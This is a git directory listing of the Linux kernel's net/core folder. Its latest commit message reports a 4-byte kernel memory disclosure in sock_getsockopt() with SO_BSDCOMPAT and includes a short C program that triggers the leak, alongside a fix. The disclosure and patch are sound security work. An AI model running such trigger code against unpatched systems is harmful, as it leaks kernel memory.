linux/net/core
Clément Lecigne df0bca049d net: 4 bytes kernel memory disclosure in SO_BSDCOMPAT gsopt try #2
In function sock_getsockopt() located in net/core/sock.c, optval v.val
is not correctly initialized and directly returned in userland in case
we have SO_BSDCOMPAT option set.

This dummy code should trigger the bug:

int main(void)
{
	unsigned char buf[4] = { 0, 0, 0, 0 };
	int len;
	int sock;
	sock = socket(33, 2, 2);
	getsockopt(sock, 1, SO_BSDCOMPAT, &buf, &len);
	printf("%x%x%x%x\n", buf[0], buf[1], buf[2], buf[3]);
	close(sock);
}

Here is a patch that fix this bug by initalizing v.val just after its
declaration.

Signed-off-by: Clément Lecigne <clement.lecigne@netasq.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-02-12 16:59:09 -08:00
..
datagram.c net: sk_free_datagram() should use sk_mem_reclaim_partial() 2008-11-05 01:38:06 -08:00
dev_mcast.c net: Rationalise email address: Network Specific Parts 2008-10-13 19:01:08 -07:00
dev.c net_dma: call dmaengine_get only if NET_DMA enabled 2009-02-06 22:06:43 -08:00
dst.c net: speedup dst_release() 2008-11-14 00:53:54 -08:00
ethtool.c ethtool: Add GGRO and SGRO ops 2008-12-15 23:44:31 -08:00
fib_rules.c net: fib_rules ordering fixes. 2008-11-07 22:52:34 -08:00
filter.c filter: add SKF_AD_NLATTR_NEST to look for nested attributes 2008-11-20 00:49:27 -08:00
flow.c netns xfrm: lookup in netns 2008-11-25 17:35:18 -08:00
gen_estimator.c pkt_sched: gen_estimator: Optimize gen_estimator_active() 2008-11-26 15:24:32 -08:00
gen_stats.c [NET_SCHED]: Convert packet schedulers from rtnetlink to new netlink API 2008-01-28 15:11:10 -08:00
iovec.c net: Use standard structures for generic socket address structures. 2008-07-19 22:35:47 -07:00
kmap_skb.h [PATCH] severing skbuff.h -> highmem.h 2006-12-04 02:00:29 -05:00
link_watch.c Revert "net: Fix for initial link state in 2.6.28" 2009-01-05 16:01:51 -08:00
Makefile net: Add SKB DMA mapping helper functions. 2008-09-11 04:51:14 -07:00
neighbour.c neigh: some entries can be skipped during dumping 2009-02-06 00:52:04 -08:00
net_namespace.c NET: net_namespace, fix lock imbalance 2009-01-20 14:39:31 -08:00
net-sysfs.c netns: filter out uevent not belonging to init_net 2008-11-25 16:46:37 -08:00
net-sysfs.h netns: Fix device renaming for sysfs 2008-05-02 17:00:58 -07:00
netevent.c [NET]: net/core/netevent.c should #include <net/netevent.h> 2007-07-05 17:40:27 -07:00
netpoll.c Merge branch 'master' of master.kernel.org:/pub/scm/linux/kernel/git/davem/net-2.6 2008-12-15 20:03:50 -08:00
pktgen.c netns xfrm: finding states in netns 2008-11-25 17:31:51 -08:00
request_sock.c net: convert BUG_TRAP to generic WARN_ON 2008-07-25 21:43:18 -07:00
rtnetlink.c netdev: introduce dev_get_stats() 2008-11-19 21:40:23 -08:00
scm.c Merge branch 'master' into next 2008-11-18 18:52:37 +11:00
skb_dma_map.c net: Fix off-by-one in skb_dma_map 2008-10-12 21:07:34 -07:00
skbuff.c net: Fix OOPS in skb_seq_read(). 2009-01-29 16:12:42 -08:00
sock.c net: 4 bytes kernel memory disclosure in SO_BSDCOMPAT gsopt try #2 2009-02-12 16:59:09 -08:00
stream.c net: Rationalise email address: Network Specific Parts 2008-10-13 19:01:08 -07:00
sysctl_net_core.c netns xfrm: per-netns sysctls 2008-11-25 18:00:48 -08:00
user_dma.c Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6 2008-07-26 20:17:56 -07:00
utils.c printk ratelimiting rewrite 2008-07-25 10:53:29 -07:00